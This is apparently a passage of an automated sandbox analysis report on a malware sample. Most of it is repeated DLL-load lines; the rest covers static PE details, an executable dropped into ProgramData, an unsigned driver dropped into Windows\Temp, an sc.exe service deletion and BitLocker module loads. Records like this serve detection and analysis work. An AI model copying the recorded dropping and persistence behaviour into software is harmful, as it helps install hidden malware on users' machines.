            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: aA45th2ixY.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: aA45th2ixY.exeStatic file information: File size 2684712 > 1048576
            Source: aA45th2ixY.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x27de00
            Source: aA45th2ixY.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: kgpcbqezuufy.exe, 00000017.00000003.1829947065.0000025D41510000.00000004.00000001.00020000.00000000.sdmp
            Source: aA45th2ixY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: aA45th2ixY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: aA45th2ixY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: aA45th2ixY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: aA45th2ixY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: aA45th2ixY.exeStatic PE information: section name: .00cfg
            Source: kgpcbqezuufy.exe.0.drStatic PE information: section name: .00cfg
            Source: C:\Users\user\Desktop\aA45th2ixY.exeCode function: 0_2_00007FF6E17D1394 push qword ptr [00007FF6E17DB004h]; ret 0_2_00007FF6E17D1403
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeCode function: 23_2_00007FF7B9E81394 push qword ptr [00007FF7B9E8B004h]; ret 23_2_00007FF7B9E81403
            Source: C:\Windows\System32\conhost.exeCode function: 35_2_0000000140001394 push qword ptr [0000000140009004h]; ret 35_2_0000000140001403

            Persistence and Installation Behavior

            barindex
            Sample is not signed and drops a device driver
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeFile created: C:\Windows\TEMP\hnkcgwelkfzn.sysJump to behavior
            Source: C:\Users\user\Desktop\aA45th2ixY.exeFile created: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeJump to dropped file
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeFile created: C:\Windows\Temp\hnkcgwelkfzn.sysJump to dropped file
            Source: C:\Users\user\Desktop\aA45th2ixY.exeFile created: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeJump to dropped file
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeFile created: C:\Windows\Temp\hnkcgwelkfzn.sysJump to dropped file
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OAQXWXCL"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
